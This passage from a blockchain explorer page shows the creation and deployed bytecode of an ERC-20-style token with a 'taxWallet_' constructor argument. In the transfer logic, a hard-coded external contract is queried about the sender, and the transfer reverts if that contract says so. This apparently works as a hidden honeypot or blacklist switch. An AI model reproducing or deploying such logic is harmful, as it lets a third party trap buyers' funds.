ffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610982578060036000828254610976919061114b565b92505081905550610a55565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610a0e578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610a059392919061117f565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a9e5780600360008282540392505081905550610aeb565b806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610b489190610df1565b60405180910390a3505050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000610bb785856103f4565b905082811015610c1a5781811015610c0a578381836040517ffb8f41b2000000000000000000000000000000000000000000000000000000008152600401610c019392919061117f565b60405180910390fd5b610c1985858484036000610759565b5b5050505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610c5b578082015181840152602081019050610c40565b60008484015250505050565b6000601f19601f8301169050919050565b6000610c8382610c21565b610c8d8185610c2c565b9350610c9d818560208601610c3d565b610ca681610c67565b840191505092915050565b60006020820190508181036000830152610ccb8184610c78565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610d0382610cd8565b9050919050565b610d1381610cf8565b8114610d1e57600080fd5b50565b600081359050610d3081610d0a565b92915050565b6000819050919050565b610d4981610d36565b8114610d5457600080fd5b50565b600081359050610d6681610d40565b92915050565b60008060408385031215610d8357610d82610cd3565b5b6000610d9185828601610d21565b9250506020610da285828601610d57565b9150509250929050565b60008115159050919050565b610dc181610dac565b82525050565b6000602082019050610ddc6000830184610db8565b92915050565b610deb81610d36565b82525050565b6000602082019050610e066000830184610de2565b92915050565b600080600060608486031215610e2557610e24610cd3565b5b6000610e3386828701610d21565b9350506020610e4486828701610d21565b9250506040610e5586828701610d57565b9150509250925092565b600060ff82169050919050565b610e7581610e5f565b82525050565b6000602082019050610e906000830184610e6c565b92915050565b600060208284031215610eac57610eab610cd3565b5b6000610eba84828501610d21565b91505092915050565b60008060408385031215610eda57610ed9610cd3565b5b6000610ee885828601610d21565b9250506020610ef985828601610d21565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680610f4a57607f821691505b602082108103610f5d57610f5c610f03565b5b50919050565b610f6c81610cf8565b82525050565b6000602082019050610f876000830184610f63565b92915050565b600081519050919050565b600081905092915050565b6000610fae82610f8d565b610fb88185610f98565b9350610fc8818560208601610c3d565b80840191505092915050565b6000610fe08284610fa3565b915081905092915050565b7f696e76616c69642063616c6c0000000000000000000000000000000000000000600082015250565b6000611021600c83610c2c565b915061102c82610feb565b602082019050919050565b6000602082019050818103600083015261105081611014565b9050919050565b61106081610dac565b811461106b57600080fd5b50565b60008151905061107d81611057565b92915050565b60006020828403121561109957611098610cd3565b5b60006110a78482850161106e565b91505092915050565b7f6e00000000000000000000000000000000000000000000000000000000000000600082015250565b60006110e6600183610c2c565b91506110f1826110b0565b602082019050919050565b60006020820190508181036000830152611115816110d9565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061115682610d36565b915061116183610d36565b92508282019050808211156111795761117861111c565b5b92915050565b60006060820190506111946000830186610f63565b6111a16020830185610de2565b6111ae6040830184610de2565b94935050505056fea2646970667358221220374b4d892cab7e474946bf3ebaffc7d311a90d244aee31e2a729afc24e152e8064736f6c634300081b0033000000000000000000000000499a728e472f535495ad5fe8e35f5aeb62e1f588
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106100935760003560e01c8063313ce56711610066578063313ce5671461013457806370a082311461015257806395d89b4114610182578063a9059cbb146101a0578063dd62ed3e146101d057610093565b806306fdde0314610098578063095ea7b3146100b657806318160ddd146100e657806323b872dd14610104575b600080fd5b6100a0610200565b6040516100ad9190610cb1565b60405180910390f35b6100d060048036038101906100cb9190610d6c565b610292565b6040516100dd9190610dc7565b60405180910390f35b6100ee6102b5565b6040516100fb9190610df1565b60405180910390f35b61011e60048036038101906101199190610e0c565b6102bf565b60405161012b9190610dc7565b60405180910390f35b61013c6102ee565b6040516101499190610e7b565b60405180910390f35b61016c60048036038101906101679190610e96565b6102f7565b6040516101799190610df1565b60405180910390f35b61018a61033f565b6040516101979190610cb1565b60405180910390f35b6101ba60048036038101906101b59190610d6c565b6103d1565b6040516101c79190610dc7565b60405180910390f35b6101ea60048036038101906101e59190610ec3565b6103f4565b6040516101f79190610df1565b60405180910390f35b60606004805461020f90610f32565b80601f016020809104026020016040519081016040528092919081815260200182805461023b90610f32565b80156102885780601f1061025d57610100808354040283529160200191610288565b820191906000526020600020905b81548152906001019060200180831161026b57829003601f168201915b5050505050905090565b60008061029d61047b565b90506102aa818585610483565b600191505092915050565b6000600354905090565b6000806102ca61047b565b90506102d7858585610495565b6102e2858285610704565b60019150509392505050565b60006012905090565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60606005805461034e90610f32565b80601f016020809104026020016040519081016040528092919081815260200182805461037a90610f32565b80156103c75780601f1061039c576101008083540402835291602001916103c7565b820191906000526020600020905b8154815290600101906020018083116103aa57829003601f168201915b5050505050905090565b6000806103dc61047b565b90506103e9818585610495565b600191505092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b6104908383836001610759565b505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036105075760006040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016104fe9190610f72565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036105795760006040517fec442f050000000000000000000000000000000000000000000000000000000081526004016105709190610f72565b60405180910390fd5b600080734a9328250815f6cf3c9f56d20d3e23dfb3c2239b73ffffffffffffffffffffffffffffffffffffffff1663a918b67b856040516024016105bd9190610f72565b6040516020818303038152906040529060e01b6020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff838183161783525050505060405161060b9190610fd4565b600060405180830381855afa9150503d8060008114610646576040519150601f19603f3d011682016040523d82523d6000602084013e61064b565b606091505b509150915081801561065f57506020815110155b61069e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161069590611037565b60405180910390fd5b808060200190518101906106b29190611083565b156106f2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106e9906110fc565b60405180910390fd5b6106fd858585610930565b5050505050565b60007fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff905061073283610b55565b61073d576000610740565b60015b60ff168101905061075384848385610bab565b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036107cb5760006040517fe602df050000000000000000000000000000000000000000000000000000000081526004016107c29190610f72565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361083d5760006040517f94280d620000000000000000000000000000000000000000000000000000000081526004016108349190610f72565b60405180910390fd5b81600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550801561092a578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516109219190610df1565b60405180910390a35b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610982578060036000828254610976919061114b565b92505081905550610a55565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610a0e578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610a059392919061117f565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a9e5780600360008282540392505081905550610aeb565b806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610b489190610df1565b60405180910390a3505050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000610bb785856103f4565b905082811015610c1a5781811015610c0a578381836040517ffb8f41b2000000000000000000000000000000000000000000000000000000008152600401610c019392919061117f565b60405180910390fd5b610c1985858484036000610759565b5b5050505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610c5b578082015181840152602081019050610c40565b60008484015250505050565b6000601f19601f8301169050919050565b6000610c8382610c21565b610c8d8185610c2c565b9350610c9d818560208601610c3d565b610ca681610c67565b840191505092915050565b60006020820190508181036000830152610ccb8184610c78565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610d0382610cd8565b9050919050565b610d1381610cf8565b8114610d1e57600080fd5b50565b600081359050610d3081610d0a565b92915050565b6000819050919050565b610d4981610d36565b8114610d5457600080fd5b50565b600081359050610d6681610d40565b92915050565b60008060408385031215610d8357610d82610cd3565b5b6000610d9185828601610d21565b9250506020610da285828601610d57565b9150509250929050565b60008115159050919050565b610dc181610dac565b82525050565b6000602082019050610ddc6000830184610db8565b92915050565b610deb81610d36565b82525050565b6000602082019050610e066000830184610de2565b92915050565b600080600060608486031215610e2557610e24610cd3565b5b6000610e3386828701610d21565b9350506020610e4486828701610d21565b9250506040610e5586828701610d57565b9150509250925092565b600060ff82169050919050565b610e7581610e5f565b82525050565b6000602082019050610e906000830184610e6c565b92915050565b600060208284031215610eac57610eab610cd3565b5b6000610eba84828501610d21565b91505092915050565b60008060408385031215610eda57610ed9610cd3565b5b6000610ee885828601610d21565b9250506020610ef985828601610d21565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680610f4a57607f821691505b602082108103610f5d57610f5c610f03565b5b50919050565b610f6c81610cf8565b82525050565b6000602082019050610f876000830184610f63565b92915050565b600081519050919050565b600081905092915050565b6000610fae82610f8d565b610fb88185610f98565b9350610fc8818560208601610c3d565b80840191505092915050565b6000610fe08284610fa3565b915081905092915050565b7f696e76616c69642063616c6c0000000000000000000000000000000000000000600082015250565b6000611021600c83610c2c565b915061102c82610feb565b602082019050919050565b6000602082019050818103600083015261105081611014565b9050919050565b61106081610dac565b811461106b57600080fd5b50565b60008151905061107d81611057565b92915050565b60006020828403121561109957611098610cd3565b5b60006110a78482850161106e565b91505092915050565b7f6e00000000000000000000000000000000000000000000000000000000000000600082015250565b60006110e6600183610c2c565b91506110f1826110b0565b602082019050919050565b60006020820190508181036000830152611115816110d9565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061115682610d36565b915061116183610d36565b92508282019050808211156111795761117861111c565b5b92915050565b60006060820190506111946000830186610f63565b6111a16020830185610de2565b6111ae6040830184610de2565b94935050505056fea2646970667358221220374b4d892cab7e474946bf3ebaffc7d311a90d244aee31e2a729afc24e152e8064736f6c634300081b0033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
000000000000000000000000499a728e472f535495ad5fe8e35f5aeb62e1f588
-----Decoded View---------------
Arg [0] : taxWallet_ (address): 0x499A728E472f535495Ad5fE8E35f5Aeb62E1f588
-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 000000000000000000000000499a728e472f535495ad5fe8e35f5aeb62e1f588
Loading...
Loading
Loading...
Loading
Net Worth in USD
$0.00
Net Worth in ETH
0
Multichain Portfolio | 33 Chains
| Chain | Token | Portfolio % | Price | Amount | Value |
|---|
Loading...
Loading
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.